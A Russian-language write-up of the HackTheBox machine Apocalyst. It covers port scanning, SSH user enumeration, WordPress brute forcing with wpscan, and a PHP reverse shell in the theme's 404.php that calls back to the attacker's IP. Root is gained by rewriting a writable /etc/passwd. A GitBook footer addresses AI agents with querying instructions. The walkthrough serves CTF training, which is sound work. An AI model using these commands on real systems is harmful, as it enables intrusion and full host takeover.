> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ru/writeups-ctf/hackthebox/linux-medium/apocalyst-hackthebox-writeup.md).

# Разбор Apocalyst на HackTheBox

{% embed url="<https://app.hackthebox.com/machines/Apocalyst>" %}

{% hint style="warning" %}
**Навыки:**

* Перечисление WordPress
* Задача по стеганографии изображения — Steghide
* Утечка информации — перечисление пользователей
* Эксплуатация WordPress — редактор тем (RCE)
* Злоупотребление неправильно настроенными разрешениями (повышение привилегий)
  {% endhint %}

## Разведка

**Настройка рабочей среды:**

Настройте рабочую среду, создав три папки для хранения важного содержимого, эксплойтов и результатов разведки Nmap.

<figure><img src="/files/ac2cae1e911fea8145292e6b616608a904329f93" alt="" width="563"><figcaption></figcaption></figure>

**Проверка подключения VPN**

Проверьте подключение к VPN, чтобы обеспечить стабильную связь с целевой машиной.

<figure><img src="/files/3266895c135ad4e70ae0e58b25dc38c95bf27d7b" alt="" width="563"><figcaption></figcaption></figure>

**Обнаружение открытых портов с помощью Nmap:**

Перечислите открытые порты и экспортируйте результаты в файл "allPorts" в каталоге Nmap:

```bash
nmap -p- --open -sS -n -Pn --min-rate 5000 -vvv 10.10.10.46 -oG allPorts
```

<figure><img src="/files/7ff6b02484c66c43ee18e6e7ac1b970ab81f81db" alt=""><figcaption></figcaption></figure>

**Сканирование версий портов с Nmap (22.80):**

Используйте Nmap для сканирования версий сервисов и сохраните вывод в файл "targeted":

```bash
nmap -sCV -p22,80 10.10.10.46 -oN targeted
```

<figure><img src="/files/f80d74c31a9b730eef1d913b7893edbe9968aa9f" alt=""><figcaption></figcaption></figure>

Мы обнаруживаем сайт WordPress, но разрешение домена настроено неверно.

<figure><img src="/files/1812a42a46722bed7ab21fdf5686c24f6779dcff" alt=""><figcaption></figcaption></figure>

Мы добавляем следующую запись в */etc/hosts*:

<figure><img src="/files/bba350f5dba3313bd82d6fce06e6371985107d88" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/bc7d2c82bf0ffae8a23c4fcc52af05dfb7544540" alt="" width="563"><figcaption></figcaption></figure>

## **Исследование сайта WordPress**

<figure><img src="/files/57e75227bcf59ae2c1ec79f3190e9c10f59c6530" alt=""><figcaption></figcaption></figure>

#### **Определить действительного пользователя**

Мы находим действительного пользователя: **falaraki**.

<figure><img src="/files/e1c4c40cd19ee5a8116c67a3b0739f4d7809d698" alt="" width="563"><figcaption></figcaption></figure>

#### **Эксплуатация SSH**

Поскольку версия SSH устарела, мы можем использовать эксплойт, чтобы подтвердить пользователя в системе:

```bash
searchsploit -m linux/remote/45939.py
```

<figure><img src="/files/9ee7a171850018e2841723af581b27ce41435123" alt=""><figcaption></figcaption></figure>

Проверить, что пользователь существует:

```bash
python2 ssh_enumeration.py 10.10.10.46 falaraki 2>/dev/null
```

<figure><img src="/files/3a05d83b1cb168fc578f2db327ebd7d126aaac01" alt=""><figcaption></figcaption></figure>

#### Итак, для WordPress:

<figure><img src="/files/3041d71f3548e1c94ba88c72da5ee26c092f7305" alt=""><figcaption></figcaption></figure>

### **Перечисление WordPress**

Мы используем *wfuzz* для поиска интересных каталогов:

{% code overflow="wrap" %}

```bash
wfuzz -u http://apocalyst.htb/FUZZ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt --hc=404 -t 200 -L
```

{% endcode %}

Этот скан обнаруживает несколько страниц, возвращающих код 301 и перенаправляющих на изображение.

<figure><img src="/files/2f9208164a459895169b122eaaf82e5fddbdea80" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/5095aa5fe20a6eb267613f24cc0843d284572ad4" alt=""><figcaption></figcaption></figure>

Затем мы фильтруем по длине текста (157):

{% code overflow="wrap" %}

```bash
wfuzz -u http://apocalyst.htb/FUZZ --hh=157 -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt --hc=404 -t 200 -L
```

{% endcode %}

Ничего интересного.

<figure><img src="/files/e9047a467af59b0bcf82035a19f63e5383763ba4" alt=""><figcaption></figcaption></figure>

### **Создание персонализированного словаря — CEWL** <a href="#custom-dictionary" id="custom-dictionary"></a>

Мы генерируем словарь на основе сайта:

<figure><img src="/files/1ff364c62d483442a6d3fd3049c83c0f49d743f1" alt=""><figcaption></figcaption></figure>

Используйте **Cewl** для генерации словаря на основе сайта:

```bash
cewl -w list.txt http://apocalyst.htb/
```

<figure><img src="/files/af938a0dd70fb31209a70d6419aaa076eb34b843" alt=""><figcaption></figcaption></figure>

Новое распознавание с *wfuzz*:

{% code overflow="wrap" %}

```bash
wfuzz -u http://apocalyst.htb/FUZZ -w list.txt --hh=157 --hc=404 -t 200 -L
```

{% endcode %}

Мы находим **`Праведность`** каталог.

<figure><img src="/files/8dfac8701d94b730f3387dba87f7ad3031629e1d" alt=""><figcaption></figcaption></figure>

### **Анализ стеганографии с помощью Steghide**

Мы сохраняем изображение и анализируем его:

1. Проверка того, содержит ли изображение скрытые данные:

<figure><img src="/files/91a00a5088fbe00443c70992ae3c1e0a4c70d3b9" alt=""><figcaption></figcaption></figure>

Проверка того, содержит ли изображение скрытые данные:

```bash
steghide info image.jpg
```

<figure><img src="/files/555263c3093e95f3b7ca5773a4ad4005b6faeb5c" alt="" width="563"><figcaption></figcaption></figure>

Извлечение скрытых данных:

```bash
steghide extract -sf image.jpg
```

<figure><img src="/files/5aac913b2dc61fc4e7db66f2b40ecffffbcfe866" alt="" width="563"><figcaption></figcaption></figure>

Один *list.txt* генерируется файл со словами

<figure><img src="/files/43ad2e3c74c02ba6eb6145ed31899c623363cbf4" alt=""><figcaption></figcaption></figure>

### **Атака перебором на WordPress**

<table data-full-width="false"><thead><tr><th data-type="content-ref"></th></tr></thead><tbody><tr><td><a href="/pages/82c9bb6d3e135362d0af8288a5af3328f542474d">/pages/82c9bb6d3e135362d0af8288a5af3328f542474d</a></td></tr></tbody></table>

<figure><img src="/files/9fdae5e169f1bbcef03b7c8ea776cabe5a92068f" alt=""><figcaption></figcaption></figure>

Мы запускаем атаку перебором с помощью *wpscan*, используя *xmlrpc.php* который активен:

```bash
wpscan --url http://apocalyst.htb -U falaraki -P list.txt
```

Мы находим **falaraki**пароль: **Транслитерация**.

<figure><img src="/files/d21ec376d36ac6b04a2182c3b05f88af813cbc27" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/905f679dbe4b8154b20bd89f6742ba55776ef1bb" alt=""><figcaption></figcaption></figure>

### **Эксплуатация WordPress — удалённое выполнение кода (RCE)**

<figure><img src="/files/7cb3af50c0496cadf0c50591f8be64f091d88ffe" alt=""><figcaption></figcaption></figure>

Мы изменяем *404.php* файл и внедряем в него reverse shell:

```php
<?php
system("bash -c 'bash -i >& /dev/tcp/10.10.14.50/443 0>&1'")
?>
```

Прослушивание порта 443:

```bash
nc -nvlp 443
```

<figure><img src="/files/0498f1b4a67178469cf550cb3ffd825bc359d02d" alt=""><figcaption></figcaption></figure>

Выполнение шелла через *curl*:

```bash
curl -s -X GET "http://apocalyst.htb/?p=404.php"
```

<figure><img src="/files/54b484328eb653f797690b07711ddd6cd07068e6" alt=""><figcaption></figcaption></figure>

#### Улучшенная shell-сессия:

```bash
script /dev/null -c bash
# Ctrl+Z

stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
stty rows 44 columns 184
```

### Флаг user.txt :)

<figure><img src="/files/1b2d693cd57dcbfef877211b75755a8a74afcb44" alt="" width="563"><figcaption></figcaption></figure>

## **Повышение привилегий**

### **Управление разрешениями (`/etc/passwd`)**

```bash
find / -writable 2>/dev/null | grep -vE "/dev|tmp|var|run|lib|proc|sys"
```

Мы видим, что */etc/passwd* можно редактировать.

<figure><img src="/files/92778ce687a38712e7ff9bfebdb9ff2a428abea1" alt=""><figcaption></figcaption></figure>

Создание зашифрованного пароля с помощью OpenSSL:

```
openssl passwd -1 -salt WylYIBz9 jordan
```

<figure><img src="/files/050020f081f50ab16eab32997a63a46e3b21e779" alt=""><figcaption></figcaption></figure>

Что генерирует:

* $1$WylYIBz9$3sZ.Aikcts/jZIpgmvnck/

Мы заменяем строку root в */etc/passwd* на наш хэш.

<figure><img src="/files/54158cc675bda78dcaa7cfd94b2989ac13afa8a2" alt=""><figcaption></figcaption></figure>

Войти как root:

<figure><img src="/files/f1fafc0f387ad59c5ac257bd9c6b92b6c55a3b3f" alt=""><figcaption></figcaption></figure>

### Флаг root.txt :)

<figure><img src="/files/bb2a7acabad5b5ba202de64693a25e932102914d" alt="" width="545"><figcaption></figcaption></figure>

<figure><img src="/files/73c61208b5e447b10716dc6bfa3849f6b821907a" alt="" width="517"><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ru/writeups-ctf/hackthebox/linux-medium/apocalyst-hackthebox-writeup.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
